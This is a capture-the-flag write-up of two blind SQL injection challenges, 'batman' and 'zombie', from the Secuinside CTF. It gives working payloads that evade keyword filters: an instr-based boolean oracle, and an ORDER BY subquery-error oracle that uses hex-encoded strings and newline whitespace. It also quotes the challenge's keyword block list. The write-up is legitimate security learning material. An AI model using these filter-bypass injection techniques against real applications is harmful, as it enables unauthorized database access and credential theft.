batman: hardfiltered blind SQL injection

http://61.42.25.29/0f9dd0e033bb0854c9de75939680ce66/?no=1 (link is down)

Didn’t have source for this one, most keywords were blocked. Query looked something like

SELECT id,no FROM batman WHERE no=$_GET['no'];
Only working string functions I could find are
instr,position,substr

all kinds of operators and spaces were blocked so I used this:

**?no=if(instr(id,0x30),3,5)**

So, if 0x[something] is in “id” I would get some text, if not then it was blank page. Used PHP script to quickly discover all chars used and they were:

D O P W d o p w

Then I manually mixed chars like this to get flag:

?no=if(instr(id,0x646f),3,5)

etc Flag was opwwddddoo instr is case-insensitive and I luckily guessed flag is lowercase :D

zombie: blind sql injection after ORDER BY…

if(eregi("load|union| |\t|/|char|ascii|hex|<|>|infor|\.|challenge2|challenge3|challenge4",$dd)) exit("Access Denied");
$q=mysql_query("select * from challenge1 order by $dd desc");

procedure is same as batman, but this time I used LIKE (every whitespace was %0a)

**if((select password from challenge1 where id=0x61646d696e and password like 0x253025),1,(select 1 from challenge1))** ->if like is false, it errors (Subquery returns more than one row)

I used PHP script to get char by char, finishing in OLDZOMBIEEEE if I remember correctly. Again, guessed case of flag ^^

Well, this is one pretty damn long wall of text :D…

I’d like to thank Secuinside people for this great CTF, I really enjoyed it - and learned few new things and tricks! Also thanks to Reiners for his blog and to hvortex for sqlgeek solution!

Regards, Plitvix